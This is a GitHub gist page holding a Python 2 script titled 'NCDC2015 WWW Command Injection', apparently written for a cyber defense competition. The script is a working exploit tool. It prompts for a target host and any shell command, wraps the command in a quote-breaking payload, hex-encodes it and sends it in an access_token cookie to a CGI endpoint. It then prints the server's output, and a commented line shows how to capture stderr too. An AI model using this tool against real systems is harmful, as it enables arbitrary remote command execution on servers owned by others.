Skip to content

Instantly share code, notes, and snippets.

@benjholla

benjholla/injection.py

Last active August 29, 2015 14:14
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save benjholla/0c2497ad52de5896681b to your computer and use it in GitHub Desktop.
Save benjholla/0c2497ad52de5896681b to your computer and use it in GitHub Desktop.
Download ZIP
NCDC2015 WWW Command Injection
Raw
injection.py
#!/usr/bin/python
import sys
import getopt
import urllib2
# define hexEncode function
hexEncode = lambda x:"".join([hex(ord(c))[2:].zfill(2) for c in x])
def main(argv):
# set defaults
target = None
# parse command line options
try:
opts, args = getopt.getopt(argv, "h", ["help", "target="])
except getopt.GetoptError:
usage()
sys.exit(2)
for opt, arg in opts:
if opt in ("-h", "--help"):
usage()
sys.exit()
elif opt in ("--target"):
target = arg
if target is None:
target = raw_input("Enter target (hostname or IP): ")
url = "http://" + target + "/cgi-bin/show/landing"
command = raw_input("Enter command to inject: ")
encodedCommand = hexEncode("' .; " + command + ";'")
# uncomment the hacky line below if you want stderr output in the response
#encodedCommand = hexEncode("' .; " + command + "&> /tmp/a; cat /tmp/a;'")
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'access_token=' + encodedCommand))
response = opener.open(url)
content = response.read()
print "-----------------------------------------------------"
print "GET " + url
print "Cookie: access_token=" + encodedCommand
print "-----------------------------------------------------"
print content
def usage():
print "Usage: web-command-injection.py [options] ..."
print "Configuration:"
print " --target=<hostname or IP> Sets the target host."
print "Miscellaneous:"
print " -h Print usage options."
print "\n"
if __name__ == "__main__":
main(sys.argv[1:])
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment